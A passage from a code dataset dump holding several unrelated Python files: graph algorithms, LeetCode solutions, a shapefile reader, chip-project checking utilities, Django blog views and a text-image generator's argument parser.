2], [1]]\nG = brandes.connectTree(edges1, edges2)\nprint(G.edges)\n\n\"\"\"\ndef connectTree(edges1, edges2):\n length = len(edges1)\n for u in range(length):\n for i in range(len(edges1[u])):\n edges1[u][i] += length\n edges1 += edges2\n return Graphs(edges1)\n\n\"\"\"\nT = [\"gfgfgf\"]\nT[0].lower()\n\n\ndef alternativeBrandes(self, start=0):\n self.constructBlocks()\n count = self.componentCount\n n = self.n\n AP_in_block = [[] for x in range(count)]\n for u in self.articulationPoints:\n for B in self.blockOfU[u]:\n AP_in_block[B].append(u)\n discovered = [False] * count\n discovered[start] = True\n discovered_vertex = [False] * n\n vertex_to_index = [-1] * n\n index_to_vertex = [-1] * n\n edges = [[] for x in range(n)]\n processed_block = [False] * count\n depth = 0\n vertices_processed = 0\n S = [(start, None)]\n while len(S) > 0:\n pair = S.pop()\n B = pair[0]\n u = pair[1]\n vertices_discovered = vertices_processed\n for u in self.blockContains[B]:\n vertex_to_index[u] = vertices_discovered\n index_to_vertex[vertices_discovered] = u\n discovered_vertex[u] = True\n vertices_discovered += 1\n for i in range(vertices_processed, vertices_discovered):\n u = index_to_vertex[i]\n if self.isArticulationPoint(u):\n for v in self.edges[u]:\n if self.isInBlock(v, B):\n j = vertex_to_index[v]\n edges[i].append(j)\n else:\n for v in self.edges[u]:\n j = vertex_to_index[v]\n edges[i].append(j)\n self.brandes_for_dfs(B, u, edges, vertices_processed)\n if u is not None:\n S = []\n P = [[] for x 
in range(n)]\n sigma = [0] * n\n sigma[s] = 1\n d = [-1] * n\n d[s] = 0\n Q = deque([s])\n while len(Q) > 0:\n i = Q.popleft()\n v = self.blockContains[B][i]\n S.append(i)\n for w in self.edges[v]:\n if self.isInBlock(w, B):\n j = self.findIndex(w, B)\n if d[j] < 0:\n Q.append(j)\n d[j] = d[i] + 1\n if d[j] == d[i] + 1: # v is a predecessor of w on a shortest path from s to w\n sigma[j] += sigma[i]\n P[j].append(i)\n delta = [0] * n\n if ap == None:\n while len(S) > 0:\n j = S.pop()\n for i in P[j]:\n delta[i] += (sigma[i] / sigma[j]) * (1 + delta[j])\n if j != s:\n w = self.blockContains[B][j]\n self.bc[w] += delta[j]\n elif u == ap:\n while len(S) > 0:\n j = S.pop()\n for i in P[j]:\n delta[i] += (sigma[i] / sigma[j]) * (1 + delta[j])\n if j != s:\n w = self.blockContains[B][j]\n self.bc[w] += vertices_processed * delta[j]\n else:\n while len(S) > 0:\n j = S.pop()\n w = self.blockContains[B][j]\n if w == ap:\n for i in P[j]:\n delta[i] += (sigma[i] / sigma[j]) * (vertices_processed + delta[j])\n if j != s:\n self.bc[w] += delta[j]\n else:\n for i in P[j]:\n delta[i] += (sigma[i] / sigma[j]) * (1 + delta[j])\n if j != s:\n self.bc[w] += delta[j]\n\n \"\"\"\n def computeTrafficMatrix(self, B):\n length = len(self.blockContains[B])\n h = [[1] * length for x in range(length)]\n for i in range(length):\n for j in range(i):\n u = self.blockContains[B][i]\n v = self.blockContains[B][j]\n if self.isArticulationPoint(u):\n if self.isArticulationPoint(v):\n h[i][j] = (self.n - self.D_B[(B, u)]) * (self.n - self.D_B[(B, v)])\n else:\n h[i][j] = self.n - self.D_B[(B, u)]\n else:\n if self.isArticulationPoint(v):\n h[i][j] = self.n - self.D_B[(B, v)]\n h[j][i] = h[i][j]\n h[i][i] = 0\n return h\n \"\"\"\n\n\n\n\"\"\"\nn = self.n\ncounter = n\nself.dfs(start, True)\nhighest = self.d.copy()\ndToVertex = [0] * n # Avoids O(n) searches later\nfor u in range(n):\n dToVertex[self.d[u]] = u\nwhile counter > 0:\n counter -= 1\n u = dToVertex[counter]\n for v in self.edges[u]:\n if v == self.pi[u]: # v is parent in dfs tree\n pass\n elif self.d[v] < self.d[u]: # backedge\n if self.d[v] < highest[u]:\n highest[u] = self.d[v]\n else: # child\n if highest[v] < highest[u]:\n highest[u] = highest[v]\nu = dToVertex[0]\nchildren = 0\nfor v in self.edges[u]:\n if u == self.pi[v]:\n children += 1\nif children > 1:\n self.articulationPoints.append(u)\n self.blockOfU[u] = []\nelse:\n self.addComponent(u)\nfor i in range(1, n):\n u = dToVertex[i]\n for v in self.edges[u]:\n if u == self.pi[v]: # v is a child of u\n if highest[v] >= i: # This means u is an articulation point\n if not self.isArticulationPoint(u):\n # This means it's the first time it's determined that u is an articulation point\n self.blockOfU[u] = []\n self.articulationPoints.append(u)\n\"\"\"\n","sub_path":"klad.py","file_name":"klad.py","file_ext":"py","file_size_in_byte":5966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"15682105","text":"# naive O(n), TLE\nclass Solution(object):\n def hIndex(self, citations):\n \"\"\"\n :type citations: List[int]\n :rtype: int\n \"\"\"\n if len(citations) == 0:\n return 0\n count = 1\n for i in range(len(citations) - 1, -1, -1):\n if citations[i] >= count:\n if i > 0:\n count += 1\n else:\n count -= 1\n break\n return count\n\n# binary search: O(logn)\nclass Solution(object):\n def hIndex(self, citations):\n \"\"\"\n :type citations: List[int]\n :rtype: int\n \"\"\"\n n = len(citations)\n low = 0\n high = n - 1\n while low <= high:\n mid = low + (high - 
low)/2\n if n - mid > citations[mid]:\n low = mid + 1\n else:\n high = mid - 1\n return n - low\n","sub_path":"search/h_index_ii.py","file_name":"h_index_ii.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"236426625","text":"#!/usr/bin/env python\nu\"\"\"\nread_shapefile.py\nWritten by Tyler Sutterley (09/2019)\nReads polygons from ESRI shapefiles\n\nINPUTS:\n input shapefile (.shp)\n\nOUTPUT:\n shapely multipolygon object of input file\n\nOPTIONS:\n EPSG: projection identifier for output coordinates\n ZIP: input file is compressed\n VARIABLES: reduce to a specific set of identifiers\n\nPYTHON DEPENDENCIES:\n numpy: Scientific Computing Tools For Python\n https://numpy.org\n https://numpy.org/doc/stable/user/numpy-for-matlab-users.html\n fiona: Python wrapper for vector data access functions from the OGR library\n https://fiona.readthedocs.io/en/latest/manual.html\n shapely: PostGIS-ish operations outside a database context for Python\n http://toblerity.org/shapely/index.html\n pyproj: Python interface to PROJ library\n https://pypi.org/project/pyproj/\n\nUPDATE HISTORY:\n Updated 09/2019: made output coordinate system an option (EPSG)\n Updated 07/2019: added option to reduce to specific VARIABLES within file\n Updated 06/2019: using fiona for consistency between read functions\n convert projection to EPSG:4326 before creating polygons\n Written 06/2019\n\"\"\"\nfrom __future__ import print_function\n\nimport os\nimport fiona\nimport numpy as np\nimport pyproj\nfrom shapely.geometry import Polygon, MultiPolygon\n\n#-- PURPOSE: read shapefiles\ndef read_shapefile(input_file, EPSG=4326, ZIP=False, VARIABLES=None):\n #-- read input zipfile containing shapefiles\n if ZIP:\n #-- read the compressed shapefile and extract entities\n shape = fiona.open('zip://{0}'.format(os.path.expanduser(input_file)))\n else:\n #-- read the shapefile and extract entities\n shape = fiona.open(os.path.expanduser(input_file),'r')\n\n #-- convert projection to EPSG\n proj1 = pyproj.Proj(\"+init={0}\".format(shape.crs['init']))\n proj2 = pyproj.Proj(\"+init=EPSG:{0:d}\".format(EPSG))\n\n #-- find features of interest\n geometries = ('LineString','Polygon')\n f = [f for f in shape.values() if f['geometry']['type'] in geometries]\n #-- reduce to variables of interest if specified\n f = [ft for ft in f if ft['id'] in VARIABLES] if VARIABLES else f\n\n #-- list of polygons\n poly_list = []\n #-- for each entity\n for i,ent in enumerate(f):\n #-- extract coordinates for entity\n for coords in ent['geometry']['coordinates']:\n #-- convert points to latitude/longitude\n x,y = np.transpose(coords)\n lon,lat = pyproj.transform(proj1, proj2, x, y)\n #-- create shapely polygon\n poly_obj = Polygon(list(zip(lon, lat)))\n #-- Valid Polygon cannot have overlapping exterior or interior rings\n if (not poly_obj.is_valid):\n poly_obj = poly_obj.buffer(0)\n poly_list.append(poly_obj)\n #-- create shapely multipolygon object\n mpoly_obj = MultiPolygon(poly_list)\n #-- return the polygon object\n return mpoly_obj\n","sub_path":"cryosat_toolkit/read_shapefile.py","file_name":"read_shapefile.py","file_ext":"py","file_size_in_byte":2989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"643849556","text":"# SPDX-FileCopyrightText: 2020 Efabless Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the 
License.\n# You may obtain a copy of the License at\n#\n#      http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# SPDX-License-Identifier: Apache-2.0\n\nimport gzip\nimport hashlib\nimport logging\nimport os\nimport shutil\nimport subprocess\nfrom pathlib import Path\n\nimport requests\nimport yaml\n\n\ndef download_gzip_file_from_url(target_url, download_path):\n    with open(download_path, 'wb') as f:\n        status_code = None\n        while status_code != 200:\n            logging.info(f\"Trying to get file {target_url}\")\n            response = requests.get(target_url, headers={'accept-encoding': 'gzip'}, stream=True)\n            status_code = response.status_code\n        logging.info(f\"Got file {target_url}\")\n        gzip_file = gzip.GzipFile(fileobj=response.raw)\n        shutil.copyfileobj(gzip_file, f)\n\n\ndef compress_gds(gds_path):\n    cmd = f\"cd {gds_path}; make compress;\"\n    try:\n        logging.info(f\"{{{{COMPRESSING GDS}}}} Compressing GDS files in {gds_path}\")\n        subprocess.run(cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)\n    except subprocess.CalledProcessError as error:\n        logging.info(f\"{{{{COMPRESSING GDS ERROR}}}} Make 'compress' Error: {error}\")\n        raise SystemExit(252)\n\n\ndef uncompress_gds(gds_path):\n    cmd = f\"cd {gds_path}; make uncompress;\"\n    try:\n        logging.info(f\"{{{{EXTRACTING GDS}}}} Extracting GDS files in: {gds_path}\")\n        subprocess.run(cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)\n    except subprocess.CalledProcessError as error:\n        logging.info(f\"{{{{EXTRACTING GDS ERROR}}}} Make 'uncompress' Error: {error}\")\n        raise SystemExit(252)\n\n\ndef is_binary_file(filename):\n    file_extensions = Path(filename).suffix\n    return 'gds' in file_extensions or 'gz' in file_extensions\n\n\ndef is_not_binary_file(filename):\n    return not is_binary_file(filename)\n\n\ndef file_hash(filename):\n    def is_compressed(filename):\n        with open(filename, 'rb') as f:\n            return f.read(2) == b'\\x1f\\x8b'\n\n    sha1 = hashlib.sha1()\n    BSIZE = 65536\n\n    if is_compressed(filename):\n        f = gzip.open(filename, 'rb')\n    else:\n        f = open(filename, 'rb')\n    while True:\n        data = f.read(BSIZE)\n        if not data:\n            break\n        sha1.update(data)\n    f.close()\n    return sha1.hexdigest()\n\n\ndef get_project_config(project_path):\n    project_config = {}\n    try:\n        yaml_path = project_path / 'info.yaml'\n        project = yaml.load(open(yaml_path, encoding='utf-8'), Loader=yaml.FullLoader).get('project')\n    except FileNotFoundError:\n        logging.error(f\"{{{{YAML NOT FOUND ERROR}}}} Required YAML file 'info.yaml' was not found in path: {project_path}\")\n        raise SystemExit(254)\n\n    if project:\n        if not project.get('top_level_netlist'):\n            logging.fatal(\"{{TOP LEVEL NETLIST NOT FOUND}} 'top_level_netlist' was not found in project 'info.yaml'\")\n        if not project.get('user_level_netlist'):\n            logging.fatal(\"{{USER LEVEL NETLIST NOT FOUND}} 'user_level_netlist' was not found in project 'info.yaml'\")\n    else:\n        logging.fatal(\"{{PROJECT YAML MALFORMED}} Project 'info.yaml' is structured incorrectly\")\n\n    if not project or not project.get('top_level_netlist') or not project.get('user_level_netlist'):\n        raise SystemExit(254)\n\n    # note: get netlists\n    project_config['top_netlist'] = project_path / project['top_level_netlist']\n    
project_config['user_netlist'] = project_path / project['user_level_netlist']\n\n # note: parse netlists\n top_level_netlist_extension = os.path.splitext(project_config['top_netlist'])[1]\n user_level_netlist_extension = os.path.splitext(project_config['user_netlist'])[1]\n\n if top_level_netlist_extension == '.v' and user_level_netlist_extension == '.v':\n project_config['netlist_type'] = 'verilog'\n elif top_level_netlist_extension == '.spice' and user_level_netlist_extension == '.spice':\n project_config['netlist_type'] = 'spice'\n else:\n logging.fatal(\"{{PARSING NETLISTS FAILED}} The provided top and user level netlists are neither '.spice' or '.v' files. Please adhere to the required input types.\")\n raise SystemExit(254)\n\n # note: get project type and set remaining config\n project_config['link_prefix'] = \"https://raw.githubusercontent.com/efabless/caravel/master\"\n is_caravan = any(netlist in str(project_config['top_netlist']) for netlist in [f'caravan.{ext}' for ext in ['v', 'spice']])\n is_caravel = any(netlist in str(project_config['top_netlist']) for netlist in [f'caravel.{ext}' for ext in ['v', 'spice']])\n is_analog_wrapper = any(netlist in str(project_config['user_netlist']) for netlist in [f'user_analog_project_wrapper.{ext}' for ext in ['v', 'spice']])\n is_digital_wrapper = any(netlist in str(project_config['user_netlist']) for netlist in [f'user_project_wrapper.{ext}' for ext in ['v', 'spice']])\n if is_caravan and is_analog_wrapper:\n project_config['type'] = 'analog'\n project_config['top_module'] = 'caravan'\n project_config['user_module'] = 'user_analog_project_wrapper'\n project_config['golden_wrapper'] = 'user_analog_project_wrapper_empty'\n elif is_caravel and is_digital_wrapper:\n project_config['type'] = 'digital'\n project_config['top_module'] = 'caravel'\n project_config['user_module'] = 'user_project_wrapper'\n project_config['golden_wrapper'] = 'user_project_wrapper_empty'\n else:\n logging.fatal(\"{{IDENTIFYING PROJECT TYPE FAILED}} The provided top level and user level netlists are not correct.\\n\"\n \"The top level netlist should point to 'caravel.(v/spice)' if your project is digital or 'caravan.(v/spice)' if your project is analog.\\n\"\n \"The user level netlist should point to 'user_project_wrapper.(v/spice)' if your project is digital or 'user_analog_project_wrapper.(v/spice)' if your project is analog.\")\n raise SystemExit(254)\n return project_config\n","sub_path":"checks/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"541332977","text":"#-*-coding: utf-8-*-\n\n# Version: 0.1\n# Author: Don Li \n# License: Copyright(c) 2015 Don.Li\n# Summary:\n\nimport sys, os\nfrom os.path import abspath, dirname, join, pardir, pathsep\n\ndef run_with_source():\n _argv = sys.argv\n return ((len(_argv) > 0) and (_argv[0].rfind('.py') >= 0))\n\n\n_ROOTPATH_CACHED = None\ndef root_path():\n global _ROOTPATH_CACHED\n\n if not _ROOTPATH_CACHED:\n _curr_path = dirname(__file__)\n\n if run_with_source():\n _relpath = ''.join((_curr_path, '/', pardir, '/', pardir))\n else:\n _relpath = ''.join((_curr_path.rsplit('/', 1)[0], '/', pardir))\n\n _ROOTPATH_CACHED = abspath(_relpath) + '/'\n\n #print(_curr_path, _relpath, _ROOTPATH_CACHED)\n\n return _ROOTPATH_CACHED\n\ndef default_config_path():\n return root_path() + 
'etc/gemini.conf'\n\n","sub_path":"src/lib/osutil.py","file_name":"osutil.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"281399040","text":"from django.shortcuts import render\r\nfrom blog2 import models\r\nfrom django.utils import timezone\r\nimport markdown\r\n# Create your views here.\r\n\r\n\r\ndef index(request):\r\n\r\n    singles = models.ExampleModel.objects.all()\r\n    return render(request, 'blog2/index.html', {'singles': singles, })\r\n\r\n\r\ndef single_page(request, single_id):\r\n\r\n\r\n    data = {}  # data is used to pass context to the template\r\n    single = models.ExampleModel.objects.get(pk=single_id)  # fetch the blog post that is being opened\r\n    data['single'] = single\r\n\r\n    next_blog = models.ExampleModel.objects.filter(id__gt=single.id).order_by('id')\r\n    pre_blog = models.ExampleModel.objects.filter(id__lt=single.id).order_by('-id')\r\n\r\n    # take the first record\r\n    if pre_blog.count() > 0:\r\n        pre_blog = pre_blog[0]\r\n    else:\r\n        pre_blog = None\r\n\r\n    if next_blog.count() > 0:\r\n        next_blog = next_blog[0]\r\n    else:\r\n        next_blog = None\r\n\r\n\r\n    single.content = markdown.markdown(single.content, extensions=[\r\n        'markdown.extensions.extra',\r\n        'markdown.extensions.codehilite',\r\n        'markdown.extensions.toc',\r\n    ])\r\n\r\n    data['pre_blog'] = pre_blog\r\n    data['next_blog'] = next_blog\r\n\r\n    return render(request, 'blog2/single.html', data, )\r\n\r\n\r\ndef pre_page(request):\r\n    # previous blog; note: 'id' in the query below is the Python builtin, so this lookup is almost certainly a bug\r\n    sql = \"select id from blog2_examplemodel where id>%s order by id limit 1\" % (id)\r\n    single_ids = models.ExampleModel.objects.raw(sql)\r\n    if len(list(single_ids)) > 0:\r\n        single_id = single_ids[0]\r\n    else:\r\n        single_id = None\r\n\r\n    single = models.ExampleModel.objects.get(pk=single_id)\r\n\r\n    single.content = markdown.markdown(single.content, extensions=[\r\n        'markdown.extensions.extra',\r\n        'markdown.extensions.codehilite',\r\n        'markdown.extensions.toc',\r\n    ])\r\n\r\n    return render(request, 'blog2/single.html', {'single': single}, )\r\n\r\n","sub_path":"blog2/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"248024982","text":"# -*- coding: utf-8 -*-\n\nfrom django.shortcuts import HttpResponse\nimport main.models as models\nimport json\n\n__author__ = 'murad'\n\n\nclass Authors():\n    def __init__(self):\n        pass\n\n    @staticmethod\n    def read(request):\n        # \"\"\"\n        # list the authors\n        # \"\"\"\n        # authors = list(\n        #     models.Authors.objects\n        #     .filter(user=request.user.id)\n        #     .values(\"author_id\",\n        #             \"name\", \"surname\", \"patronymic\",\n        #             \"mail\", \"tel\", \"post\",\n        #             \"department\", \"department__name\")\n        # )\n        # for author in authors:\n        #     author[\"department\"] = {\n        #         \"department_id\": author.pop(\"department\") if author[\"department\"] else \"\",\n        #         \"name\": author.pop(\"department__name\") if author[\"department__name\"] else \"\"\n        #     }\n        # if authors:\n        #     return HttpResponse(json.dumps(authors), content_type=\"application/json\")\n        # else:\n        #     return HttpResponse(json.dumps(\"\"), content_type=\"application/json\")\n        \"\"\"\n        list the authors\n        \"\"\"\n        authors = list(\n            models.Authors.objects\n            .filter(user=request.user.id, is_active=True)\n        )\n        items = list()\n        for author in authors:  # FIXME: do refactor here\n            item = {\n                \"author_id\": author.author_id,\n                \"name\": author.name,\n                \"surname\": author.surname,\n                \"patronymic\": author.patronymic,\n                \"full_name\": str(author),\n                
\"department\": {\n                    \"department_id\": author.department.department_id if author.department else \"\",\n                    \"name\": author.department.name if author.department else \"\"\n                },\n                \"mail\": author.mail,\n                \"tel\": author.tel,\n                \"post\": author.post,\n            }\n            items.append(item)\n        if items:\n            return HttpResponse(json.dumps(items), content_type=\"application/json\")\n        else:\n            return HttpResponse(json.dumps(\"\"), content_type=\"application/json\")\n\n    @staticmethod\n    def destroy(request):\n        \"\"\"\n        delete an author\n        \"\"\"\n        item = json.loads(request.POST.get(\"item\"))\n        author = models.Authors.objects.get(author_id=int(item[\"author_id\"]))\n        author.is_active = False\n        author.save()\n        return HttpResponse(json.dumps({}), content_type=\"application/json\")\n\n    @staticmethod\n    def create(request):\n        \"\"\"\n        add an author\n        \"\"\"\n        item = json.loads(request.POST.get(\"item\"))\n        try:\n            department = models.Department.objects.get(department_id=int(item[\"department\"]))\n        except:\n            department = None\n        new_author = models.Authors.objects.create(\n            name=item[\"name\"],\n            surname=item[\"surname\"],\n            is_active=True,\n            patronymic=item[\"patronymic\"],\n            tel=item[\"tel\"],\n            mail=item[\"mail\"],\n            post=item[\"post\"],\n            department=department,\n            user=request.user)\n        return HttpResponse(json.dumps({\"author_id\": new_author.author_id,\n                                        \"name\": new_author.name,\n                                        \"surname\": new_author.surname,\n                                        \"patronymic\": new_author.patronymic,\n                                        \"full_name\": str(new_author),\n                                        \"tel\": new_author.tel,\n                                        \"mail\": new_author.mail,\n                                        \"post\": new_author.post,\n                                        \"department\": {\"department_id\": department.department_id if department else \"\",\n                                                       \"name\": department.name if department else \"\"}}),\n                            content_type=\"application/json\")\n\n    @staticmethod\n    def update(request):\n        \"\"\"\n        edit an author\n        \"\"\"\n        item = json.loads(request.POST.get(\"item\"))\n        author = models.Authors.objects.get(author_id=int(item[\"author_id\"]))\n        try:\n            department = models.Department.objects.get(department_id=item[\"department\"])\n        except:\n            department = None\n        author.name = item[\"name\"]\n        author.surname = item[\"surname\"]\n        author.patronymic = item[\"patronymic\"]\n        author.tel = item[\"tel\"]\n        author.mail = item[\"mail\"]\n        author.post = item[\"post\"]\n        author.department = department\n        author.save()\n        return HttpResponse(json.dumps({\"author_id\": author.author_id,\n                                        \"name\": author.name,\n                                        \"surname\": author.surname,\n                                        \"patronymic\": author.patronymic,\n                                        \"full_name\": str(author),\n                                        \"tel\": author.tel,\n                                        \"mail\": author.mail,\n                                        \"post\": author.post,\n                                        \"department\": {\n                                            \"department_id\": department.department_id if department else \"\",\n                                            \"name\": department.name if department else \"\"}}),\n                            content_type=\"application/json\")","sub_path":"main/views/authors.py","file_name":"authors.py","file_ext":"py","file_size_in_byte":5589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"244690473","text":"\"\"\"\nthis file is from Azhar\n\"\"\"\n\nclass Node(object):\n    def __init__(self, info):\n        self.info = info\n        self.left = None\n        self.right = None\n\n\ndef is_pure(node):\n    return node.info > 7\n\n\ndef build_recurse_tree(node):\n    if is_pure(node):\n        print('node is pure')\n    else:\n        # meta, node.left, node.right = computeOptimalSplit(node)\n        node.left = build_recurse_tree(Node(2 * node.info))\n        node.right = build_recurse_tree(Node(2 * node.info + 1))\n    return node\n\ndef inorderTraverse(node):\n    print(node.info)\n#    print(node.left)\n    if 
node.left!=None:\n        inorderTraverse(node.left)\n    if node.right!=None:\n        inorderTraverse(node.right)\n\nroot = Node(1)\nroot = build_recurse_tree(root)\ninorderTraverse(root)\n\n\n\n\n","sub_path":"codes/build_tree.py","file_name":"build_tree.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"497703340","text":"from pytorch_pretrained_bert.tokenization import BertTokenizer\nfrom typing import List\n\n\nclass SubWordAlignment(BertTokenizer):\n    def __init__(self, vocab_file, do_lower_case=True, max_len=None,\n                 never_split=(\"[UNK]\", \"[SEP]\", \"[PAD]\", \"[CLS]\", \"[MASK]\")):\n        super(SubWordAlignment, self).__init__(vocab_file, do_lower_case, max_len, never_split)\n\n    def alignment(self, tokens: List[str], subwords: List[str]):\n        tokenized_tokens = [[tokenized_tokens for tokenized_tokens in self.basic_tokenizer.tokenize(token)]\n                            for token in tokens]\n        assert len(tokenized_tokens) == len(tokens)\n\n        idx = 0\n        indices = []\n        for chunk in tokenized_tokens:\n            buffer = []\n            for token in chunk:\n                for sub_token in self.wordpiece_tokenizer.tokenize(token):\n                    buffer.append(idx)\n                    assert sub_token == subwords[idx]\n                    idx += 1\n            indices.append(buffer)\n\n        assert len(subwords) == idx\n        assert len(tokens) == len(indices)\n\n        return indices\n","sub_path":"BERT/my_functions/alignment.py","file_name":"alignment.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"233917468","text":"import platform\n\nclass MyPlatform:\n    def __init__(self):\n        system = platform.system().lower()\n        dist = platform.dist()\n        if system == 'windows':  # Windows\n            self.path = 'D:/Projects'\n        elif system == 'darwin':  # Mac OSX\n            self.path = '/Users/Nelson/Projects'\n        elif system == 'linux':\n            if dist[1] == '14.04':  # PythonAnywhere Linux\n                self.path = '/home/nelson137/Projects'\n            elif dist[1] == '16.04':  # Ubuntu-Desktop Linux\n                self.path = '/home/limbo/Projects'\n            else:\n                self.path = 'Unknown System'\n        else:\n            self.path = 'Unknown System'\n","sub_path":"myplatform/myplatform/MyPlatform.py","file_name":"MyPlatform.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"44628893","text":"class TreeNode:\n    def __init__(self, x):\n        self.val = x\n        self.right = None\n        self.left = None\n\nclass Solution:\n    def __init__(self):\n        self.res = float('inf')\n        self.pre = -float('inf')\n\n    def getMinimumDifference(self, root):\n        \"\"\"\n        :type root: TreeNode\n        :rtype: int\n        inorder traversal\n        \"\"\"\n        if root:\n            self.getMinimumDifference(root.left)\n            if root.val is not None:  # a plain truthiness check would wrongly skip a node whose value is 0\n                self.res = min(self.res, root.val - self.pre)\n                self.pre = root.val\n            self.getMinimumDifference(root.right)\n        return self.res\n    \n\nif __name__ == \"__main__\":\n    root = TreeNode(0)\n    root.left = TreeNode(None)\n    root.right = TreeNode(2236)\n    root.right.left = TreeNode(1277)\n    root.right.left.left = TreeNode(519)\n    root.right.right = TreeNode(2776)\n    sol = Solution()\n    res = sol.getMinimumDifference(root)\n    print(res)","sub_path":"BST/MinAbsDiffinBST.py","file_name":"MinAbsDiffinBST.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"131737140","text":"import argparse\nimport os, errno\nimport random\nimport string\nimport math\nimport uuid\nimport shutil\n\nfrom fontTools.ttLib import TTFont\n\n\nimport 
matplotlib.pyplot as plt \nimport matplotlib.font_manager as mfm\n\nimport file_parser\n\nfrom tqdm import tqdm\nfrom string_generator import (\n create_strings_from_dict,\n create_strings_from_file,\n create_strings_from_wikipedia,\n create_strings_randomly\n)\nfrom data_generator import FakeTextDataGenerator\nfrom multiprocessing import Pool\n\ndef margins(margin):\n margins = margin.split(',')\n if len(margins) == 1:\n return [margins[0]] * 4\n return [int(m) for m in margins]\n\ndef parse_arguments():\n \"\"\"\n Parse the command line arguments of the program.\n \"\"\"\n\n parser = argparse.ArgumentParser(description='Generate synthetic text data for text recognition.')\n parser.add_argument(\n \"--output_dir\",\n type=str,\n nargs=\"?\",\n help=\"The output directory\",\n default=\"out/\",\n )\n parser.add_argument(\n \"-i\",\n \"--input_file\",\n type=str,\n nargs=\"?\",\n help=\"When set, this argument uses a specified text file as source for the text\",\n default=\"\"\n )\n parser.add_argument(\n \"-l\",\n \"--language\",\n type=str,\n nargs=\"?\",\n help=\"The language to use, should be fr (French), en (English), es (Spanish), de (German), hist (for historic fonts) or cn (Chinese).\",\n default=\"hist\"\n )\n parser.add_argument(\n \"-c\",\n \"--count\",\n type=int,\n nargs=\"?\",\n help=\"The number of images to be created.\",\n default=100\n )\n parser.add_argument(\n \"-rs\",\n \"--random_sequences\",\n action=\"store_true\",\n help=\"Use random sequences as the source text for the generation. Set '-let','-num','-sym' to use letters/numbers/symbols. If none specified, using all three.\",\n default=False\n )\n parser.add_argument(\n \"-let\",\n \"--include_letters\",\n action=\"store_true\",\n help=\"Define if random sequences should contain letters. Only works with -rs\",\n default=False\n )\n parser.add_argument(\n \"-num\",\n \"--include_numbers\",\n action=\"store_true\",\n help=\"Define if random sequences should contain numbers. Only works with -rs\",\n default=False\n )\n parser.add_argument(\n \"-sym\",\n \"--include_symbols\",\n action=\"store_true\",\n help=\"Define if random sequences should contain symbols. Only works with -rs\",\n default=False\n )\n parser.add_argument(\n \"-w\",\n \"--length\",\n type=int,\n nargs=\"?\",\n help=\"Define how many words should be included in each generated sample. If the text source is Wikipedia, this is the MINIMUM length\",\n default=5\n )\n parser.add_argument(\n \"-r\",\n \"--random\",\n action=\"store_true\",\n help=\"Define if the produced string will have variable word count (with --length being the maximum)\",\n default=False\n )\n parser.add_argument(\n \"-f\",\n \"--format\",\n type=int,\n nargs=\"?\",\n help=\"Define the height of the produced images if horizontal, else the width\",\n default=65,\n )\n parser.add_argument(\n \"-t\",\n \"--thread_count\",\n type=int,\n nargs=\"?\",\n help=\"Define the number of thread to use for image generation\",\n default=1,\n )\n parser.add_argument(\n \"-e\",\n \"--extension\",\n type=str,\n nargs=\"?\",\n help=\"Define the extension to save the image with\",\n default=\"png\",\n )\n parser.add_argument(\n \"-k\",\n \"--skew_angle\",\n type=int,\n nargs=\"?\",\n help=\"Define skewing angle of the generated text. 
In positive degrees\",\n        default=0,\n    )\n    parser.add_argument(\n        \"-rk\",\n        \"--random_skew\",\n        action=\"store_true\",\n        help=\"When set, the skew angle will be randomized between the value set with -k and its opposite\",\n        default=False,\n    )\n    parser.add_argument(\n        \"-wk\",\n        \"--use_wikipedia\",\n        action=\"store_true\",\n        help=\"Use Wikipedia as the source text for the generation, using this parameter ignores -r, -n, -s\",\n        default=False,\n    )\n    parser.add_argument(\n        \"-bl\",\n        \"--blur\",\n        type=int,\n        nargs=\"?\",\n        help=\"Apply gaussian blur to the resulting sample. Should be an integer defining the blur radius\",\n        default=0,\n    )\n    parser.add_argument(\n        \"-rbl\",\n        \"--random_blur\",\n        action=\"store_true\",\n        help=\"When set, the blur radius will be randomized between 0 and -bl.\",\n        default=False,\n    )\n    parser.add_argument(\n        \"-b\",\n        \"--background\",\n        type=int,\n        nargs=\"?\",\n        help=\"Define what kind of background to use. 0: Gaussian Noise, 1: Plain white, 2: Quasicrystal, 3: Pictures\",\n        default=1,\n    )\n    parser.add_argument(\n        \"-hw\",\n        \"--handwritten\",\n        action=\"store_true\",\n        help=\"Define if the data will be \\\"handwritten\\\" by an RNN\",\n    )\n    parser.add_argument(\n        \"-na\",\n        \"--name_format\",\n        type=int,\n        help=\"Define how the produced files will be named. 0: [TEXT]_[ID].[EXT], 1: [ID]_[TEXT].[EXT] 2: [ID].[EXT] + one file labels.txt containing id-to-label mappings\",\n        default=2,\n        